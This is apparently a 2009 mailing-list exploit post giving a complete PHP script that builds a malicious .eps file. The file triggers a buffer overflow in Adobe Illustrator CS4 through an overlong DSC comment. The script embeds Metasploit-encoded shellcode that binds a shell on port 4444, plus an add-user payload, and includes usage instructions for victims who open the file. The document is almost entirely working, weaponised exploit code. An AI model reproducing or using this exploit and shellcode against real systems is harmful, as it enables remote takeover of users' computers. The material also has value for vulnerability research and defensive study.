|
| From: | rgod <nospam_(at)_gmail.it> | | Date: | 04.12.2009 | | Subject: | Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps) Overlong DSC Comment Buffer Overflow Exploit |
<?php
/*
Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)
overlong DSC Comment Buffer Overflow Exploit
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
An overlong string as DSC comment (more than 42000 bytes)
results in a direct EIP overwrite.
Exception is first-chance so the program will never crash.
At the moment of the redirection EAX and ESI are user-controlled.
This portion of the buffer begins with '%' (it is the next DSC
comment) but as you can see the resulting pattern is
nop-equivalent.
Tested and working against xp sp3
change the call esi if you need, must be alphabetic
I used a "call esi" from comctl32.dll on xp sp3,
change if needed.
Usage: php 9sg_illu.php
then double-click on the resulting 9sg.eps file
it will bind a shell on port 4444
change the shellcode for your needs even.
*/
# windows/adduser - 446 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, USER=adobe, PASS=kills
$_scode_i = "\xda\xc9\xd9\x74\x24\xf4\x59\x49\x49\
x49\x49\x49\x49\x49" .
"\x49\x49\x49\x43\x43\x43\x43\
x43\x43\x43\x37\x51\x5a\x6a" .
"\x41\x58\x50\x30\x41\x30\x41\
x6b\x41\x41\x51\x32\x41\x42" .
"\x32\x42\x42\x30\x42\x42\x41\
x42\x58\x50\x38\x41\x42\x75" .
"\x4a\x49\x4b\x4c\x4a\x48\x47\
x34\x43\x30\x43\x30\x45\x50" .
"\x4c\x4b\x47\x35\x47\x4c\x4c\
x4b\x43\x4c\x45\x55\x43\x48" .
"\x45\x51\x4a\x4f\x4c\x4b\x50\
x4f\x44\x58\x4c\x4b\x51\x4f" .
"\x51\x30\x45\x51\x4a\x4b\x47\
x39\x4c\x4b\x50\x34\x4c\x4b" .
"\x43\x31\x4a\x4e\x50\x31\x49\
x50\x4a\x39\x4e\x4c\x4d\x54" .
"\x49\x50\x44\x34\x45\x57\x49\
x51\x48\x4a\x44\x4d\x43\x31" .
"\x49\x52\x4a\x4b\x4a\x54\x47\
x4b\x46\x34\x47\x54\x43\x34" .
"\x43\x45\x4a\x45\x4c\x4b\x51\
x4f\x47\x54\x43\x31\x4a\x4b" .
"\x45\x36\x4c\x4b\x44\x4c\x50\
x4b\x4c\x4b\x51\x4f\x45\x4c" .
"\x45\x51\x4a\x4b\x4c\x4b\x45\
x4c\x4c\x4b\x43\x31\x4a\x4b" .
"\x4d\x59\x51\x4c\x47\x54\x44\
x44\x48\x43\x51\x4f\x50\x31" .
"\x4b\x46\x43\x50\x46\x36\x45\
x34\x4c\x4b\x47\x36\x50\x30" .
"\x4c\x4b\x47\x30\x44\x4c\x4c\
x4b\x42\x50\x45\x4c\x4e\x4d" .
"\x4c\x4b\x42\x48\x43\x38\x4b\
x39\x4a\x58\x4c\x43\x49\x50" .
"\x42\x4a\x46\x30\x42\x48\x4c\
x30\x4d\x5a\x44\x44\x51\x4f" .
"\x45\x38\x4d\x48\x4b\x4e\x4c\
x4a\x44\x4e\x51\x47\x4b\x4f" .
"\x4d\x37\x42\x43\x42\x4d\x42\
x44\x46\x4e\x45\x35\x43\x48" .
"\x42\x45\x51\x30\x46\x4f\x45\
x33\x47\x50\x42\x4e\x42\x45" .
"\x42\x54\x51\x30\x43\x45\x43\
x43\x45\x35\x43\x42\x51\x30" .
"\x45\x31\x45\x34\x42\x4f\x42\
x42\x43\x55\x47\x50\x42\x4b" .
"\x45\x39\x42\x4c\x42\x4c\x42\
x53\x51\x30\x46\x4f\x51\x51" .
"\x47\x34\x50\x44\x51\x30\x47\
x56\x51\x36\x51\x30\x42\x4e" .
"\x42\x45\x44\x34\x47\x50\x42\
x4c\x42\x4f\x42\x43\x45\x31" .
"\x42\x4c\x43\x57\x43\x42\x42\
x4f\x44\x35\x44\x30\x47\x50" .
"\x47\x31\x42\x44\x42\x4d\x42\
x49\x42\x4e\x45\x39\x42\x53" .
"\x43\x44\x42\x52\x45\x31\x43\
x44\x42\x4f\x44\x32\x44\x33" .
"\x51\x30\x45\x31\x45\x34\x42\
x4f\x43\x52\x42\x45\x47\x50" .
"\x46\x4f\x47\x31\x47\x34\x51\
x54\x45\x50\x41\x41";
# windows/shell_bind_tcp - 696 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
$_scode_ii = "\x89\xe5\xda\xd0\xd9\x75\xf4\x5e\x56\
x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\
x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\
x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\
x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x43\
x5a\x4a\x4b\x50\x4d\x4d\x38" .
"\x4b\x49\x4b\x4f\x4b\x4f\x4b\
x4f\x45\x30\x4c\x4b\x42\x4c" .
"\x46\x44\x51\x34\x4c\x4b\x47\
x35\x47\x4c\x4c\x4b\x43\x4c" .
"\x43\x35\x43\x48\x43\x31\x4a\
x4f\x4c\x4b\x50\x4f\x42\x38" .
"\x4c\x4b\x51\x4f\x47\x50\x43\
x31\x4a\x4b\x51\x59\x4c\x4b" .
"\x46\x54\x4c\x4b\x43\x31\x4a\
x4e\x50\x31\x49\x50\x4a\x39" .
"\x4e\x4c\x4d\x54\x49\x50\x43\
x44\x45\x57\x49\x51\x49\x5a" .
"\x44\x4d\x43\x31\x49\x52\x4a\
x4b\x4c\x34\x47\x4b\x50\x54" .
"\x51\x34\x46\x48\x43\x45\x4b\
x55\x4c\x4b\x51\x4f\x47\x54" .
"\x45\x51\x4a\x4b\x42\x46\x4c\
x4b\x44\x4c\x50\x4b\x4c\x4b" .
"\x51\x4f\x45\x4c\x43\x31\x4a\
x4b\x45\x53\x46\x4c\x4c\x4b" .
"\x4b\x39\x42\x4c\x47\x54\x45\
x4c\x45\x31\x48\x43\x46\x51" .
"\x49\x4b\x45\x34\x4c\x4b\x50\
x43\x50\x30\x4c\x4b\x51\x50" .
"\x44\x4c\x4c\x4b\x44\x30\x45\
x4c\x4e\x4d\x4c\x4b\x51\x50" .
"\x43\x38\x51\x4e\x45\x38\x4c\
x4e\x50\x4e\x44\x4e\x4a\x4c" .
"\x50\x50\x4b\x4f\x48\x56\x45\
x36\x50\x53\x43\x56\x45\x38" .
"\x50\x33\x46\x52\x45\x38\x44\
x37\x43\x43\x47\x42\x51\x4f" .
"\x51\x44\x4b\x4f\x4e\x30\x45\
x38\x48\x4b\x4a\x4d\x4b\x4c" .
"\x47\x4b\x50\x50\x4b\x4f\x49\
x46\x51\x4f\x4c\x49\x4a\x45" .
"\x45\x36\x4b\x31\x4a\x4d\x43\
x38\x43\x32\x51\x45\x42\x4a" .
"\x45\x52\x4b\x4f\x48\x50\x45\
x38\x4e\x39\x44\x49\x4b\x45" .
"\x4e\x4d\x46\x37\x4b\x4f\x48\
x56\x50\x53\x46\x33\x51\x43" .
"\x51\x43\x46\x33\x51\x53\x46\
x33\x51\x53\x46\x33\x4b\x4f" .
"\x4e\x30\x45\x36\x45\x38\x42\
x31\x51\x4c\x45\x36\x46\x33" .
"\x4b\x39\x4d\x31\x4a\x35\x42\
x48\x4e\x44\x44\x5a\x42\x50" .
"\x49\x57\x51\x47\x4b\x4f\x49\
x46\x43\x5a\x44\x50\x50\x51" .
"\x51\x45\x4b\x4f\x48\x50\x42\
x48\x49\x34\x4e\x4d\x46\x4e" .
"\x4d\x39\x51\x47\x4b\x4f\x48\
x56\x51\x43\x51\x45\x4b\x4f" .
"\x48\x50\x42\x48\x4d\x35\x51\
x59\x4b\x36\x51\x59\x50\x57" .
"\x4b\x4f\x4e\x36\x46\x30\x50\
x54\x46\x34\x51\x45\x4b\x4f" .
"\x4e\x30\x4c\x53\x45\x38\x4d\
x37\x43\x49\x48\x46\x44\x39" .
"\x50\x57\x4b\x4f\x4e\x36\x46\
x35\x4b\x4f\x4e\x30\x43\x56" .
"\x42\x4a\x43\x54\x42\x46\x43\
x58\x45\x33\x42\x4d\x4d\x59" .
"\x4d\x35\x43\x5a\x46\x30\x51\
x49\x47\x59\x48\x4c\x4b\x39" .
"\x4d\x37\x43\x5a\x50\x44\x4d\
x59\x4b\x52\x50\x31\x49\x50" .
"\x4c\x33\x4e\x4a\x4b\x4e\x47\
x32\x46\x4d\x4b\x4e\x47\x32" .
"\x46\x4c\x4c\x53\x4c\x4d\x43\
x4a\x46\x58\x4e\x4b\x4e\x4b" .
"\x4e\x4b\x43\x58\x42\x52\x4b\
x4e\x48\x33\x44\x56\x4b\x4f" .
"\x44\x35\x47\x34\x4b\x4f\x48\
x56\x51\x4b\x51\x47\x46\x32" .
"\x46\x31\x50\x51\x50\x51\x42\
x4a\x45\x51\x50\x51\x50\x51" .
"\x51\x45\x50\x51\x4b\x4f\x4e\
x30\x42\x48\x4e\x4d\x49\x49" .
"\x43\x35\x48\x4e\x51\x43\x4b\
x4f\x49\x46\x43\x5a\x4b\x4f" .
"\x4b\x4f\x50\x37\x4b\x4f\x4e\
x30\x4c\x4b\x46\x37\x4b\x4c" .
"\x4d\x53\x48\x44\x45\x34\x4b\
x4f\x4e\x36\x50\x52\x4b\x4f" .
"\x4e\x30\x42\x48\x4a\x50\x4d\
x5a\x44\x44\x51\x4f\x50\x53" .
"\x4b\x4f\x4e\x36\x4b\x4f\x48\
x50\x41\x41";
$_eip = "\x57\x6b\x41\x77"; //0x77416b57 alphabetic call esi, comctl32.dll
$_boom = "\xc5\xd0\xd3\xc6\x20\x00\x00\x00\x05\
xc8\x04\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00%\xc8\
x04\x00\xb5I\x01\x00\xff".
"\xff\x00\x00".
"%!PS-Adobe-3.1\x20EPSF-3.0\r\n".
"%ADO_DSC_Encoding:
\x20Windows\x20Roman\r\n".
"%".
str_repeat("A", 41699).
$_eip.
str_repeat("A", 2291).
"%Title:\x20Untitled-1.eps\r\n".
"%AAAAAAAA". // we jump here, nop-equivalent
$_scode_ii.
": A\r\n".
"%%For:\x20alias\r\n".
"%%CreationDate:\x2011/27/2009\r\n".
"%%BoundingBox:
\x200\x200\x20227\x20171\r\n".
"%%HiResBoundingBox:\x200\x200\x20226.
5044\x20170.3165\r\n".
"%%CropBox:\x200\x200\x20226.
5044\x20170.3165\r\n".
"%%LanguageLevel:\x202\r\n".
"%%DocumentData:\x20Clean7Bit\r\n".
"%ADOBeginClientInjection:
\x20DocumentHeader\x20\"AI11EPS\"\r\n".
"%%AI8_CreatorVersion:\x2014.0.0\r".
"%AI9_PrintingDataBegin\r".
"%ADO_BuildNumber:
\x20Adobe\x20Illustrator(R)\x2014.0.
0\x20x367\x20R\x20agm\x204.4890\x20ct\x205.
1541\r".
"%ADO_ContainsXMP:\x20MainFirst\r".
"%AI7_Thumbnail:\x20128\x2096\x208\r".
"%%BeginData:
\x204096\x20Hex\x20Bytes\r".
"%0000330000660000990000CC0033000033330033660033990033CC0033
FF\r\n";
file_put_contents("9sg.eps", $_boom);
?>
original url: http://retrogod.altervista.org/9sg_adobe_illuso.html
|
